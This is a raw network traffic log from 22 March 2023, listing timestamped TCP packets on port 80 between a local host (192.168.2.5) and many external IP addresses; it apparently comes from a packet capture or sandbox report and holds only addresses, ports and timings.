Mar 22, 2023 05:43:17.376087904 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376125097 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.376133919 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376178026 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376646042 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.376704931 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376729965 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.376777887 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.376782894 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376825094 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.376833916 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376871109 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376871109 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.376914024 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376918077 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.376962900 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.376966000 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.377008915 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.377552032 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.377599955 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.377614021 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.377645969 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.377645969 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.377691984 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.377695084 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.377737999 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.377738953 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.377780914 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.377783060 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.377827883 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.377830029 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.377873898 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.378242016 CET	80	49739	69.163.239.62	192.168.2.5
Mar 22, 2023 05:43:17.378304958 CET	49739	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:17.378428936 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.378477097 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.378488064 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.378523111 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.378525019 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.378567934 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.378568888 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.378613949 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.378616095 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.378660917 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.378663063 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.378703117 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.378739119 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.378791094 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.379302979 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.379344940 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.379354954 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.379389048 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.602179050 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.625744104 CET	49760	80	192.168.2.5	198.100.146.220
Mar 22, 2023 05:43:17.827341080 CET	80	49740	66.94.119.160	192.168.2.5
Mar 22, 2023 05:43:17.827481985 CET	49740	80	192.168.2.5	66.94.119.160
Mar 22, 2023 05:43:18.295959949 CET	80	49745	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:18.296075106 CET	49745	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:18.319318056 CET	80	49734	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:18.319443941 CET	49734	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:18.320105076 CET	80	49748	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:18.320183039 CET	49748	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:18.653023005 CET	80	49746	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:18.653146982 CET	49746	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:19.587065935 CET	80	49758	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:19.587222099 CET	49758	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:19.868136883 CET	49766	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:19.868573904 CET	49767	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:19.890239954 CET	80	49767	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:19.898194075 CET	80	49759	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:19.898379087 CET	49759	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:20.054241896 CET	80	49767	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:20.054275990 CET	80	49767	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:20.054342985 CET	49767	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:20.054656982 CET	49767	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:20.151453018 CET	80	49766	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:20.152991056 CET	80	49766	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:20.153232098 CET	49766	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:20.401592970 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.403577089 CET	49769	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:20.426573992 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.426661968 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.426990032 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.453641891 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.491784096 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.491839886 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.491888046 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.491931915 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.491946936 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.491978884 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.492007971 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.492007971 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.492026091 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.492033005 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.492068052 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.492086887 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.492115974 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.492849112 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.492897034 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.492923975 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.492938995 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.492945910 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.492999077 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.518665075 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518713951 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518742085 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518770933 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518798113 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518826008 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518855095 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518855095 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.518882990 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518888950 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.518909931 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518915892 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.518932104 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.518938065 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518966913 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.518966913 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.518981934 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.518995047 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.519023895 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.519052029 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.519064903 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.519085884 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.519103050 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.520112038 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.520139933 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.520283937 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.520319939 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.520432949 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.520462036 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.520488024 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.520519972 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.520699024 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.520751953 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.520987988 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.521037102 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.539485931 CET	49770	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:20.545488119 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.545538902 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.545586109 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.545619011 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.545650005 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.545696020 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.545698881 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.545700073 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.545743942 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.545773029 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.545773029 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.545788050 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.545803070 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.545841932 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.546273947 CET	49768	80	192.168.2.5	193.70.68.254
Mar 22, 2023 05:43:20.561510086 CET	80	49770	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:20.561624050 CET	49770	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:20.572202921 CET	80	49769	103.224.182.241	192.168.2.5
Mar 22, 2023 05:43:20.572323084 CET	49769	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:20.572714090 CET	80	49768	193.70.68.254	192.168.2.5
Mar 22, 2023 05:43:20.657020092 CET	49770	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:20.657166958 CET	49769	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:20.671675920 CET	49771	80	192.168.2.5	93.187.206.66
Mar 22, 2023 05:43:20.680046082 CET	80	49770	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:20.681792021 CET	80	49770	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:20.681885958 CET	49770	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:20.766623020 CET	80	49771	93.187.206.66	192.168.2.5
Mar 22, 2023 05:43:20.766781092 CET	49771	80	192.168.2.5	93.187.206.66
Mar 22, 2023 05:43:20.790246010 CET	80	49764	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:20.790359974 CET	49764	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:20.839121103 CET	49772	80	192.168.2.5	210.140.73.39
Mar 22, 2023 05:43:20.848326921 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:20.848454952 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:20.861766100 CET	49771	80	192.168.2.5	93.187.206.66
Mar 22, 2023 05:43:20.867827892 CET	80	49769	103.224.182.241	192.168.2.5
Mar 22, 2023 05:43:20.877856016 CET	80	49769	103.224.182.241	192.168.2.5
Mar 22, 2023 05:43:20.877916098 CET	80	49769	103.224.182.241	192.168.2.5
Mar 22, 2023 05:43:20.878015041 CET	49769	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:20.878015041 CET	49769	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:20.879220963 CET	49769	80	192.168.2.5	103.224.182.241
Mar 22, 2023 05:43:20.947292089 CET	49773	80	192.168.2.5	107.180.98.101
Mar 22, 2023 05:43:20.956813097 CET	80	49771	93.187.206.66	192.168.2.5
Mar 22, 2023 05:43:20.957026005 CET	80	49771	93.187.206.66	192.168.2.5
Mar 22, 2023 05:43:20.957118988 CET	49771	80	192.168.2.5	93.187.206.66
Mar 22, 2023 05:43:21.045897007 CET	80	49769	103.224.182.241	192.168.2.5
Mar 22, 2023 05:43:21.050210953 CET	49774	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:21.071592093 CET	80	49774	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:21.071700096 CET	49774	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:21.074965000 CET	49774	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:21.096234083 CET	80	49774	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:21.104512930 CET	80	49774	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:21.104588032 CET	49774	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:21.122309923 CET	80	49773	107.180.98.101	192.168.2.5
Mar 22, 2023 05:43:21.122415066 CET	49773	80	192.168.2.5	107.180.98.101
Mar 22, 2023 05:43:21.143006086 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:21.144073009 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:21.292752981 CET	49773	80	192.168.2.5	107.180.98.101
Mar 22, 2023 05:43:21.389092922 CET	49775	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:21.410540104 CET	80	49775	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:21.413391113 CET	49775	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:21.414436102 CET	49775	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:21.435615063 CET	80	49775	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:21.468343019 CET	80	49773	107.180.98.101	192.168.2.5
Mar 22, 2023 05:43:21.471997023 CET	49776	80	192.168.2.5	96.91.204.114
Mar 22, 2023 05:43:21.472630978 CET	80	49773	107.180.98.101	192.168.2.5
Mar 22, 2023 05:43:21.472790003 CET	49773	80	192.168.2.5	107.180.98.101
Mar 22, 2023 05:43:21.472933054 CET	49773	80	192.168.2.5	107.180.98.101
Mar 22, 2023 05:43:21.621223927 CET	49777	80	192.168.2.5	185.53.177.50
Mar 22, 2023 05:43:21.647614956 CET	80	49773	107.180.98.101	192.168.2.5
Mar 22, 2023 05:43:21.651376009 CET	80	49775	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:21.651426077 CET	80	49775	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:21.651470900 CET	49775	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:21.651536942 CET	49775	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:21.652970076 CET	80	49777	185.53.177.50	192.168.2.5
Mar 22, 2023 05:43:21.653098106 CET	49777	80	192.168.2.5	185.53.177.50
Mar 22, 2023 05:43:21.684844971 CET	80	49777	185.53.177.50	192.168.2.5
Mar 22, 2023 05:43:21.745217085 CET	49777	80	192.168.2.5	185.53.177.50
Mar 22, 2023 05:43:21.749644041 CET	49775	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:21.770872116 CET	80	49775	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:21.777647018 CET	80	49777	185.53.177.50	192.168.2.5
Mar 22, 2023 05:43:21.876012087 CET	80	49775	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:21.876552105 CET	80	49775	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:21.876610994 CET	49775	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:21.879461050 CET	49775	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:21.997431993 CET	80	49777	185.53.177.50	192.168.2.5
Mar 22, 2023 05:43:21.997529984 CET	80	49777	185.53.177.50	192.168.2.5
Mar 22, 2023 05:43:21.997600079 CET	80	49777	185.53.177.50	192.168.2.5
Mar 22, 2023 05:43:21.997649908 CET	49777	80	192.168.2.5	185.53.177.50
Mar 22, 2023 05:43:21.997667074 CET	80	49777	185.53.177.50	192.168.2.5
Mar 22, 2023 05:43:21.997685909 CET	49777	80	192.168.2.5	185.53.177.50
Mar 22, 2023 05:43:22.000096083 CET	49777	80	192.168.2.5	185.53.177.50
Mar 22, 2023 05:43:22.234963894 CET	80	49729	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:22.235666037 CET	49729	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:22.305861950 CET	49778	80	192.168.2.5	104.21.73.182
Mar 22, 2023 05:43:22.329612970 CET	80	49778	104.21.73.182	192.168.2.5
Mar 22, 2023 05:43:22.329737902 CET	49778	80	192.168.2.5	104.21.73.182
Mar 22, 2023 05:43:22.330054998 CET	49778	80	192.168.2.5	104.21.73.182
Mar 22, 2023 05:43:22.351972103 CET	80	49778	104.21.73.182	192.168.2.5
Mar 22, 2023 05:43:22.388127089 CET	80	49778	104.21.73.182	192.168.2.5
Mar 22, 2023 05:43:22.388183117 CET	80	49778	104.21.73.182	192.168.2.5
Mar 22, 2023 05:43:22.388252020 CET	80	49778	104.21.73.182	192.168.2.5
Mar 22, 2023 05:43:22.388258934 CET	49778	80	192.168.2.5	104.21.73.182
Mar 22, 2023 05:43:22.388309956 CET	49778	80	192.168.2.5	104.21.73.182
Mar 22, 2023 05:43:22.388322115 CET	49778	80	192.168.2.5	104.21.73.182
Mar 22, 2023 05:43:22.683598995 CET	49779	80	192.168.2.5	195.78.66.50
Mar 22, 2023 05:43:22.747323990 CET	80	49779	195.78.66.50	192.168.2.5
Mar 22, 2023 05:43:22.748563051 CET	49779	80	192.168.2.5	195.78.66.50
Mar 22, 2023 05:43:22.766329050 CET	49779	80	192.168.2.5	195.78.66.50
Mar 22, 2023 05:43:22.831348896 CET	80	49779	195.78.66.50	192.168.2.5
Mar 22, 2023 05:43:22.833901882 CET	80	49779	195.78.66.50	192.168.2.5
Mar 22, 2023 05:43:22.833981037 CET	49779	80	192.168.2.5	195.78.66.50
Mar 22, 2023 05:43:22.986985922 CET	49780	80	192.168.2.5	165.227.252.190
Mar 22, 2023 05:43:23.091198921 CET	80	49780	165.227.252.190	192.168.2.5
Mar 22, 2023 05:43:23.093586922 CET	49780	80	192.168.2.5	165.227.252.190
Mar 22, 2023 05:43:23.093888044 CET	49780	80	192.168.2.5	165.227.252.190
Mar 22, 2023 05:43:23.197725058 CET	80	49780	165.227.252.190	192.168.2.5
Mar 22, 2023 05:43:23.198352098 CET	80	49780	165.227.252.190	192.168.2.5
Mar 22, 2023 05:43:23.198528051 CET	49780	80	192.168.2.5	165.227.252.190
Mar 22, 2023 05:43:23.396728992 CET	49781	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:23.429888010 CET	80	49781	213.186.33.40	192.168.2.5
Mar 22, 2023 05:43:23.431780100 CET	49781	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:23.460333109 CET	49781	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:23.523770094 CET	80	49781	213.186.33.40	192.168.2.5
Mar 22, 2023 05:43:23.527679920 CET	49781	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:23.572482109 CET	49781	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:23.607433081 CET	80	49781	213.186.33.40	192.168.2.5
Mar 22, 2023 05:43:23.607814074 CET	49781	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:23.632421970 CET	49760	80	192.168.2.5	198.100.146.220
Mar 22, 2023 05:43:23.655389071 CET	80	49708	213.186.33.17	192.168.2.5
Mar 22, 2023 05:43:23.655838966 CET	49708	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:24.023104906 CET	49772	80	192.168.2.5	210.140.73.39
Mar 22, 2023 05:43:24.190866947 CET	80	49704	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:24.191044092 CET	49704	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:24.476587057 CET	49776	80	192.168.2.5	96.91.204.114
Mar 22, 2023 05:43:26.002540112 CET	49782	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:26.002641916 CET	49783	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:26.002872944 CET	49784	80	192.168.2.5	137.118.26.67
Mar 22, 2023 05:43:26.002975941 CET	49785	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:26.003179073 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.004903078 CET	49787	80	192.168.2.5	104.21.23.9
Mar 22, 2023 05:43:26.005009890 CET	49788	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.025924921 CET	80	49787	104.21.23.9	192.168.2.5
Mar 22, 2023 05:43:26.026048899 CET	49787	80	192.168.2.5	104.21.23.9
Mar 22, 2023 05:43:26.026309967 CET	80	49783	192.124.249.20	192.168.2.5
Mar 22, 2023 05:43:26.026427031 CET	49783	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:26.036232948 CET	49787	80	192.168.2.5	104.21.23.9
Mar 22, 2023 05:43:26.036880970 CET	49783	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:26.037132978 CET	80	49782	80.93.82.33	192.168.2.5
Mar 22, 2023 05:43:26.037482977 CET	49782	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:26.037842035 CET	49782	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:26.057321072 CET	80	49787	104.21.23.9	192.168.2.5
Mar 22, 2023 05:43:26.060606956 CET	80	49783	192.124.249.20	192.168.2.5
Mar 22, 2023 05:43:26.060731888 CET	80	49783	192.124.249.20	192.168.2.5
Mar 22, 2023 05:43:26.060858011 CET	49783	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:26.066312075 CET	80	49787	104.21.23.9	192.168.2.5
Mar 22, 2023 05:43:26.066387892 CET	49787	80	192.168.2.5	104.21.23.9
Mar 22, 2023 05:43:26.073242903 CET	80	49782	80.93.82.33	192.168.2.5
Mar 22, 2023 05:43:26.073318958 CET	49782	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:26.111841917 CET	80	49785	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:26.111953020 CET	49785	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:26.125930071 CET	49785	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:26.125971079 CET	49783	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:26.150424004 CET	80	49783	192.124.249.20	192.168.2.5
Mar 22, 2023 05:43:26.150510073 CET	49783	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:26.152735949 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:26.152761936 CET	49789	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:26.153119087 CET	49782	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:26.168211937 CET	80	49788	3.130.253.23	192.168.2.5
Mar 22, 2023 05:43:26.168349981 CET	49788	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.173882961 CET	80	49789	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:26.174019098 CET	49789	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:26.188649893 CET	80	49782	80.93.82.33	192.168.2.5
Mar 22, 2023 05:43:26.188724041 CET	49782	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:26.211781025 CET	49788	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.211822987 CET	49789	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:26.233021975 CET	80	49789	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:26.234744072 CET	80	49785	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:26.235938072 CET	80	49785	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:26.236027956 CET	49785	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:26.241334915 CET	80	49789	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:26.241417885 CET	49789	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:26.274990082 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.275106907 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.313097954 CET	49785	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:26.332391977 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.340668917 CET	49791	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:26.371057034 CET	80	49788	3.130.253.23	192.168.2.5
Mar 22, 2023 05:43:26.371087074 CET	80	49788	3.130.253.23	192.168.2.5
Mar 22, 2023 05:43:26.371144056 CET	49788	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.371185064 CET	49788	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.378786087 CET	49788	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.422624111 CET	80	49785	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:26.422729015 CET	49785	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:26.457024097 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.457103968 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:26.472882032 CET	49792	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.479763985 CET	80	49791	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:26.479886055 CET	49791	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:26.491624117 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:26.495810986 CET	49791	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:26.537720919 CET	80	49788	3.130.253.23	192.168.2.5
